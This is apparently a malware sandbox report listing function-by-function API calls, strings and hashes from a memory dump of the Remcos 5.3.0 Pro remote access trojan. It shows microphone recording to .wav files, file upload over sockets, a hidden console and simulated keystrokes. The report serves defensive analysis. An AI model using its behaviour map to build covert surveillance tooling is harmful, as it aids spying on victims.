                                                                                                                                                              • API String ID: 2050909247-4242073005
                                                                                                                                                              • Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                                                                              • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                                                                                                                              • Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                                                                              • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                                                                                                                              APIs
                                                                                                                                                              • _strftime.LIBCMT ref: 00401AD3
                                                                                                                                                                • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                                                              • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                                                                              • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                                                                              • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                                                              • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                                                                              • API String ID: 3809562944-3643129801
                                                                                                                                                              • Opcode ID: a486acdecd70e56ae6275222454893cf0b15f71a35234b0713371b2576243bbe
                                                                                                                                                              • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                                                                                                                              • Opcode Fuzzy Hash: a486acdecd70e56ae6275222454893cf0b15f71a35234b0713371b2576243bbe
                                                                                                                                                              • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                                                                                                                              APIs
                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                                                                              • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                                                                                              • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                                                                              • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                                                                              • waveInStart.WINMM ref: 00401A81
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                                                              • String ID: XCG$`=G$x=G
                                                                                                                                                              • API String ID: 1356121797-903574159
                                                                                                                                                              • Opcode ID: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
                                                                                                                                                              • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                                                                                                                              • Opcode Fuzzy Hash: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
                                                                                                                                                              • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                                                                                                                                • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                                                                                • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                                                                                • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                                                                                                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                                                                                                                              • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                                                                                                                              • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                                                                                                                              • TranslateMessage.USER32(?), ref: 0041C9FB
                                                                                                                                                              • DispatchMessageA.USER32(?), ref: 0041CA05
                                                                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                                              • String ID: Remcos
                                                                                                                                                              • API String ID: 1970332568-165870891
                                                                                                                                                              • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                                                              • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                                                                                                                              • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                                                              • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b03e61c4093a21660133e67fc3f0c2c165a648bd703d9864a2b1dbb5c11dd296
                                                                                                                                                              • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                                                                                                                              • Opcode Fuzzy Hash: b03e61c4093a21660133e67fc3f0c2c165a648bd703d9864a2b1dbb5c11dd296
                                                                                                                                                              • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                                                                                                                              APIs
                                                                                                                                                              • GetCPInfo.KERNEL32(?,?), ref: 00452BD6
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452C59
                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00452C91
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452CEC
                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452D03
                                                                                                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452D7F
                                                                                                                                                              • __freea.LIBCMT ref: 00452DAA
                                                                                                                                                              • __freea.LIBCMT ref: 00452DB6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 201697637-0
                                                                                                                                                              • Opcode ID: cde961f71f83e5614e0e0585355dc136788689c58c90c98609e3e8ecc25f0046
                                                                                                                                                              • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                                                                                                                              • Opcode Fuzzy Hash: cde961f71f83e5614e0e0585355dc136788689c58c90c98609e3e8ecc25f0046
                                                                                                                                                              • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                                                                                                                              APIs
                                                                                                                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1454806937-0
                                                                                                                                                              • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                              • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                                                              • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                              • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                              • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                                                                                                              • _free.LIBCMT ref: 00444714
                                                                                                                                                              • _free.LIBCMT ref: 0044472D
                                                                                                                                                              • _free.LIBCMT ref: 0044475F
                                                                                                                                                              • _free.LIBCMT ref: 00444768
                                                                                                                                                              • _free.LIBCMT ref: 00444774
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                              • String ID: C
                                                                                                                                                              • API String ID: 1679612858-1037565863
                                                                                                                                                              • Opcode ID: c6fcd5880bd625b4a5129d8bb50f9dce15208ec8dbffb9e3d29668755d1ef29e
                                                                                                                                                              • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                                                                                                                              • Opcode Fuzzy Hash: c6fcd5880bd625b4a5129d8bb50f9dce15208ec8dbffb9e3d29668755d1ef29e
                                                                                                                                                              • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: tcp$udp
                                                                                                                                                              • API String ID: 0-3725065008
                                                                                                                                                              • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                                                                              • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                                                                                                                              • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                                                                              • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free
                                                                                                                                                              • String ID: gKE$HE$HE
                                                                                                                                                              • API String ID: 269201875-2777690135
                                                                                                                                                              • Opcode ID: be36c282a63d03c20bc32278ff653e2fb99f791dd32da19cc4c4d74979feac0c
                                                                                                                                                              • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                                                                                                              • Opcode Fuzzy Hash: be36c282a63d03c20bc32278ff653e2fb99f791dd32da19cc4c4d74979feac0c
                                                                                                                                                              • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                                                                                                              APIs
                                                                                                                                                              • ExitThread.KERNEL32 ref: 004017F4
                                                                                                                                                                • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                                                                                • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                                                                              • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                                                                                • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                                                                                • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                                                                                • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                                              • String ID: T=G$p[G$>G$>G
                                                                                                                                                              • API String ID: 1596592924-2461731529
                                                                                                                                                              • Opcode ID: 03a186512c6701b29411dcb5ad7ed2e07cbc7342fcb7f914bbe2927d5dc56238
                                                                                                                                                              • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                                                                                                                              • Opcode Fuzzy Hash: 03a186512c6701b29411dcb5ad7ed2e07cbc7342fcb7f914bbe2927d5dc56238
                                                                                                                                                              • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(000002D4,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                                                                                • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                                                                                • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                                              • String ID: .part
                                                                                                                                                              • API String ID: 1303771098-3499674018
                                                                                                                                                              • Opcode ID: d50e3930c99f8cddacc32f51ad6110cbbcfbd567f3e003bfc65bfd9ee2b121de
                                                                                                                                                              • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                                                                                                                              • Opcode Fuzzy Hash: d50e3930c99f8cddacc32f51ad6110cbbcfbd567f3e003bfc65bfd9ee2b121de
                                                                                                                                                              • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                                                                                                • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                                                                                                • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                                                                                                • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                                                                                • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                                                                                                                              • _wcslen.LIBCMT ref: 0041A8F6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                                                              • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                                                              • API String ID: 3286818993-703403762
                                                                                                                                                              • Opcode ID: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
                                                                                                                                                              • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                                                                                                                              • Opcode Fuzzy Hash: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
                                                                                                                                                              • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                                                                                                                              APIs
                                                                                                                                                              • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                                                                                                                              • GetConsoleWindow.KERNEL32 ref: 0041BEBF
                                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                                                                                                              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Console$Window$AllocOutputShow
                                                                                                                                                              • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                                                                                              • API String ID: 4067487056-2527699604
                                                                                                                                                              • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                                                                              • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                                                                                                                              • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                                                                              • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                                                                                                                              APIs
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 004499E2
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                                                                                                                              • __freea.LIBCMT ref: 00449B37
                                                                                                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                                                              • __freea.LIBCMT ref: 00449B40
                                                                                                                                                              • __freea.LIBCMT ref: 00449B65
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3864826663-0
                                                                                                                                                              • Opcode ID: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                                                                                                              • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                                                                                                                              • Opcode Fuzzy Hash: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                                                                                                              • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                                                                                                                              APIs
                                                                                                                                                              • SendInput.USER32 ref: 00418B08
                                                                                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                                                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                                                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                                                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                                                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                                                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                                                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                                                                                                                                • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
